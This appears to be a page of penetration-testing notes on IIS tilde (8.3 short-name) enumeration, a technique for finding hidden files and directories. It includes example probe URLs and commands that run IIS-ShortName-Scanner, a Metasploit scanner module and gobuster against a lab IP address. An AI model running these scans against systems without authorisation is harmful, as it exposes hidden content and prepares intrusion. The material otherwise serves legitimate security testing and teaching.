IIS

IIS Tilde Enumeration

IIS tilde directory enumeration is a technique utilised to uncover hidden files, directories, and short file names (aka the 8.3 format) on some versions of Microsoft Internet Information Services (IIS) web servers.

Exploitation

Assuming there was a directory called SecretDocuments

http://example.com/~s -> 200 OK

http://example.com/~secre -> 200 OK

Once the shortname is identified http://example.com/secre~1/

Then try to access a file http://example.com/secre~1/somefi~1.txt

Using IIS Shortname Scanner

$ # install https://github.com/irsdl/IIS-ShortName-Scanner.git
$ java -jar iis_shortname_scanner.jar 0 5 http://10.129.204.231/
$ msfconsole
msf6 > auxiliary/scanner/http/iis_shortname_scanner

Generating Wordlist

You need to get the real name because the shortname can't access the files. You need the full name to access it. Shortname is just helpful for bruteforcing

$ egrep -r ^transf /usr/share/wordlists/ | sed 's/^[^:]*://' > /tmp/list.txt
$ gobuster dir -u http://10.129.204.231/ -w /tmp/list.txt -x .aspx,.asp
PreviousColdFusionNextLDAP

Last updated